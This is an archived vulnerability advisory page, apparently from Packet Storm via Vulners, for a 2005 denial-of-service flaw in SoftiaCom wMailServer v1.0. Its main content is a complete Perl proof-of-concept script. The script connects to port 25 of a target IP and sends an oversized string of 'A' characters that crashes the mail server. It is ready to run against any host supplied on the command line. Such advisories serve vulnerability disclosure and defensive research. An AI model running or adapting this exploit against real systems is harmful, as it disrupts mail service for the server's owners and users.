Lucene search
K

wms_poc.pl.txt

🗓️ 13 Jul 2005 00:00:00Reported by fRoGGzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Denial of Service vulnerability in SoftiaCom MailServer version 1.0 demonstrated with a proof of concept.

Code
`SoftiaCom MailServer v2.0 - Denial Of Service  
  
Software: wMailServer  
Corporation: SoftiaCom Software  
Version: v1.0 (v2.0 is the same...)  
Vulnerability: Denial of Service  
  
  
------------------------------------------  
  
  
BACKGROUND  
__________  
  
  
SoftiaCom design and build software utilities in communication and network server.  
  
WMailserver is an internet email server able to listin in the appropriate mail port  
to fetch incoming emails from the net. You can add users and manage them, avoid spam.  
  
  
Source: www.softiacom.com  
  
  
  
Proof of Concept  
________________  
  
  
#!/usr/bin/perl  
# -----------------------------------------------------  
# Vulnerability: Denial Of Service - Crash  
# Discovered on: July 9, 2005  
# Coded by: fRoGGz - SecuBox Labs  
# Severity: Normal  
# -----------------------------------------------------  
  
$boulet = $ARGV[0];  
  
use IO::Socket;  
print "\n\nSoftiaCom Software - wMailServer v1.0\r\n";  
print "Denial Of Service - Crash Vulnerability\r\n";  
print "---------------------------------------------\r\n";  
print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n";  
if(!$ARGV[0]) {  
die "Utilisation: ./wms_poc.pl <ip>\n";  
}  
  
print "[ ] Connexion sur $boulet\n";  
my($suckette) = "";  
if ($suckette = IO::Socket::INET->new(PeerAddr => $boulet,PeerPort => "25",Proto => "TCP"))  
{  
print $suckette " " . "\x41" x 539 . "\r\n";  
print "[ ] Emission du paquet malicieux ...\n";  
sleep 2;  
close $suckette;  
print "[ ] Mission terminée !\n\n";  
}  
else  
{  
print "[-] Impossible de se connecter sur $boulet\n";  
}  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation